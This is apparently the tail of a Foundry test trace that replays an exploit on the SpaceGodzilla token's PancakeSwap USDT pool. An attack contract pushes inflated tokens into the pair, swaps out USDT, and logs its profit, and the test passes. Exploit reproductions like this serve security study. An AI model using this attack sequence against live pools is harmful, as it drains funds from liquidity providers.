    │   ├─ [531] USDT::balanceOf(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]) [staticcall]
    │   │   └─ ← [Return] 3073671601005728817456539 [3.073e24]
    │   ├─ [930] SpaceGodzilla::balanceOf(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]) [staticcall]
    │   │   └─ ← [Return] 2304035330453846258332039150862 [2.304e30]
    │   ├─ emit Transfer(from: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], value: 71547633305548541368986317451004 [7.154e31])
    │   ├─  storage changes:
    │   │   @ 0x0a251b299094fe7653060a0da2916b93fbec2308fcacb83b6c04d01286617b24: 0x000000000000000000000000000000000000001d14bd5b221223f915569c7d0e → 0x00000000000000000000000000000000000003a4239c8019ab3f244e0029ec0a
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000003870edf24f7991b2b38a98d6efc → 0
    │   └─ ← [Return] true
    ├─ [930] SpaceGodzilla::balanceOf(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]) [staticcall]
    │   └─ ← [Return] 73851668636002387627318356601866 [7.385e31]
    ├─ emit log_named_uint(key: "address(CakeLP) SpaceGodzilla_balance", val: 73851668636002387627318356601866 [7.385e31])
    ├─ emit log_named_uint(key: "First swap amount1Out", val: 2975314109773545495278570 [2.975e24])
    ├─ [18768] CakeLP::swap(0, 2975314109773545495278570 [2.975e24], AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   ├─ [3271] USDT::transfer(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2975314109773545495278570 [2.975e24])
    │   │   ├─ emit Transfer(from: CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], to: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2975314109773545495278570 [2.975e24])
    │   │   ├─  storage changes:
    │   │   │   @ 0x0a251b299094fe7653060a0da2916b93fbec2308fcacb83b6c04d01286617b24: 0x000000000000000000000000000000000000000000028ae01245089fcbdfa59b → 0x0000000000000000000000000000000000000000000014d3f864835914dc71b1
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 80000 → 0x00000000000000000000000000000000000000000002760c19e08546b7046c6a
    │   │   └─ ← [Return] true
    │   ├─ [930] SpaceGodzilla::balanceOf(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]) [staticcall]
    │   │   └─ ← [Return] 73851668636002387627318356601866 [7.385e31]
    │   ├─ [531] USDT::balanceOf(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]) [staticcall]
    │   │   └─ ← [Return] 98357491232183322177969 [9.835e22]
    │   ├─ emit Sync(reserve0: 73851668636002387627318356601866 [7.385e31], reserve1: 98357491232183322177969 [9.835e22])
    │   ├─ emit Swap(sender: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 71547633305548541368986317451004 [7.154e31], amount1In: 20000 [2e4], amount0Out: 0, amount1Out: 2975314109773545495278570 [2.975e24], to: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x62cf2828000000028ae01245089fcbdf577b001d14bd5b221223f915569c7d0e → 0x62cf28280000000014d3f864835914dc71b103a4239c8019ab3f244e0029ec0a
    │   └─ ← [Stop]
    ├─ [531] USDT::balanceOf(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 2975314109773545495358570 [2.975e24]
    ├─ emit log_named_decimal_uint(key: "[info] Attacker Wallet USDT Balance", val: 2975314109773545495358570 [2.975e24], decimals: 18)
    ├─ emit log_named_decimal_uint(key: "[Profit] Attacker Wallet USDT Profit", val: 22516379770379089945837 [2.251e22], decimals: 18)
    ├─  storage changes:
    │   @ 0x0a251b299094fe7653060a0da2916b93fbec2308fcacb83b6c04d01286617b24: 0x000000000000000000000000000000000000000000001328dae0848bb96dbc08 → 0x00000000000000000000000000000000000003a4239c8019ab3f244e0029ec0a
    │   @ 12: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 14.59s (12.70s CPU time)

Ran 2 test suites in 15.55s (15.20s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
